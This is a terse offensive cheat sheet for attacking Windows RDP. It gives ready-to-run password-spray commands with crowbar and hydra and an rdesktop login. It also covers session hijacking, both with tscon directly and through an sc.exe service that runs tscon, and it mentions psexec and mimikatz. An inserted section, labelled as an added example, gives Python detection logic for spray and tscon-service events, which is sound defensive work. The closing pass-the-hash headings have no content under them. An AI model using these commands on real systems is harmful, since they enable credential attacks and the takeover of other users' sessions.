abuse

Password spray attack

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

RDP login

rdesktop -U admin -p password123 192.148.34.143

RDP session hijack attack or impersonate a user (requires admin privilege)

METHOD:1

query user
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

METHOD:2 - If we have local admin privilege

psexec
mimikatz

TRICK - create windows service

query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
net start sessionhijack
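Detection logic for both techniques above (the RDP password spray and the tscon service trick), as an added example that is not part of the original page. The records mimic the fields of Windows Security 4625 and System 7045 events; the sample events, the account threshold and the dict shape are constructed assumptions:

```python
"""Flag RDP password sprays and service-based tscon session hijacks in
Windows event records (dict-shaped 4625 / 7045 events, constructed here)."""
from collections import defaultdict
import re

# Constructed sample events: one password sprayed across five accounts from a
# single source (LogonType 10 = RemoteInteractive/RDP), one benign failure,
# then a service install whose ImagePath wraps tscon, as in the sc.exe trick.
EVENTS = [
    {"EventID": 4625, "TargetUserName": u, "IpAddress": "192.168.220.5",
     "LogonType": 10} for u in ("alice", "bob", "carol", "dave", "erin")
] + [
    {"EventID": 4625, "TargetUserName": "alice", "IpAddress": "10.0.0.9",
     "LogonType": 10},
    {"EventID": 7045, "ServiceName": "sessionhijack",
     "ImagePath": "cmd.exe /k tscon 2 /dest:rdp-tcp#13"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]

SPRAY_MIN_ACCOUNTS = 5  # assumption: tune to the environment's baseline
TSCON_RE = re.compile(r"\btscon(\.exe)?\b", re.IGNORECASE)


def detect_password_spray(events, min_accounts=SPRAY_MIN_ACCOUNTS):
    """Return {source_ip: sorted distinct accounts} for sources whose failed
    RDP logons (4625, LogonType 10) touch at least min_accounts accounts.
    A spray is many accounts with few attempts each, so distinct accounts per
    source is the signal, not the total failure count."""
    seen = defaultdict(set)
    for e in events:
        if e.get("EventID") == 4625 and e.get("LogonType") == 10:
            seen[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: sorted(users) for ip, users in seen.items()
            if len(users) >= min_accounts}


def detect_tscon_service(events):
    """Return names of newly installed services (7045) whose ImagePath
    invokes tscon: a legitimate service has no reason to call it."""
    return [e["ServiceName"] for e in events
            if e.get("EventID") == 7045
            and TSCON_RE.search(e.get("ImagePath", ""))]


if __name__ == "__main__":
    print(detect_password_spray(EVENTS))
    print(detect_tscon_service(EVENTS))
```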

RDP - pass the hash attack

RDP Restriction mode disable

PTH attack command